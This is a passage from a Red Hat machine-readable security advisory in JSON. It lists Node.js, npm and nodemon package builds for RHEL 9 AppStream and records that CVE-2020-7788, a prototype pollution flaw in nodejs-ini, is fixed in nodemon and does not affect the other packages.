"nodejs-debugsource-1:16.16.0-1.el9_0.i686", "product": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.i686", "product_id": "nodejs-debugsource-1:16.16.0-1.el9_0.i686", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.16.0-1.el9_0?arch=i686\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "product": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "product_id": "nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.16.0-1.el9_0?arch=i686\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "product": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "product_id": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs-debuginfo@16.16.0-1.el9_0?arch=i686\u0026epoch=1" } } } ], "category": "architecture", "name": "i686" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.16.0-1.el9_0.s390x", "product": { "name": "nodejs-1:16.16.0-1.el9_0.s390x", "product_id": "nodejs-1:16.16.0-1.el9_0.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.16.0-1.el9_0?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "product": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "product_id": "nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.16.0-1.el9_0?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-1:16.16.0-1.el9_0.s390x", "product": { "name": "nodejs-libs-1:16.16.0-1.el9_0.s390x", "product_id": "nodejs-libs-1:16.16.0-1.el9_0.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs@16.16.0-1.el9_0?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "product": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "product_id": "npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.11.0-1.16.16.0.1.el9_0?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "product": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "product_id": "nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.16.0-1.el9_0?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "product": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "product_id": "nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.16.0-1.el9_0?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "product": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "product_id": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs-debuginfo@16.16.0-1.el9_0?arch=s390x\u0026epoch=1" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "nodejs-docs-1:16.16.0-1.el9_0.noarch", "product": { "name": "nodejs-docs-1:16.16.0-1.el9_0.noarch", "product_id": "nodejs-docs-1:16.16.0-1.el9_0.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-docs@16.16.0-1.el9_0?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "product": { "name": "nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "product_id": "nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.19-1.el9_0?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.16.0-1.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64" }, "product_reference": "nodejs-1:16.16.0-1.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.16.0-1.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le" }, "product_reference": "nodejs-1:16.16.0-1.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.16.0-1.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x" }, "product_reference": "nodejs-1:16.16.0-1.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.16.0-1.el9_0.src as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src" }, "product_reference": "nodejs-1:16.16.0-1.el9_0.src", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.16.0-1.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64" }, "product_reference": "nodejs-1:16.16.0-1.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64" }, "product_reference": "nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686" }, "product_reference": "nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le" }, "product_reference": "nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x" }, "product_reference": "nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64" }, "product_reference": "nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64" }, "product_reference": "nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686" }, "product_reference": "nodejs-debugsource-1:16.16.0-1.el9_0.i686", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le" }, "product_reference": "nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x" }, "product_reference": "nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64" }, "product_reference": "nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-docs-1:16.16.0-1.el9_0.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch" }, "product_reference": "nodejs-docs-1:16.16.0-1.el9_0.noarch", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64" }, "product_reference": "nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le" }, "product_reference": "nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x" }, "product_reference": "nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64" }, "product_reference": "nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-1:16.16.0-1.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64" }, "product_reference": "nodejs-libs-1:16.16.0-1.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-1:16.16.0-1.el9_0.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686" }, "product_reference": "nodejs-libs-1:16.16.0-1.el9_0.i686", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-1:16.16.0-1.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le" }, "product_reference": "nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-1:16.16.0-1.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x" }, "product_reference": "nodejs-libs-1:16.16.0-1.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-1:16.16.0-1.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64" }, "product_reference": "nodejs-libs-1:16.16.0-1.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64" }, "product_reference": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686" }, "product_reference": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le" }, "product_reference": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x" }, "product_reference": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64" }, "product_reference": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.19-1.el9_0.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch" }, "product_reference": "nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.19-1.el9_0.src as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" }, "product_reference": "nodejs-nodemon-0:2.0.19-1.el9_0.src", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64" }, "product_reference": "npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le" }, "product_reference": "npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x" }, "product_reference": "npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" }, "product_reference": "npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.MAIN.EUS" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], 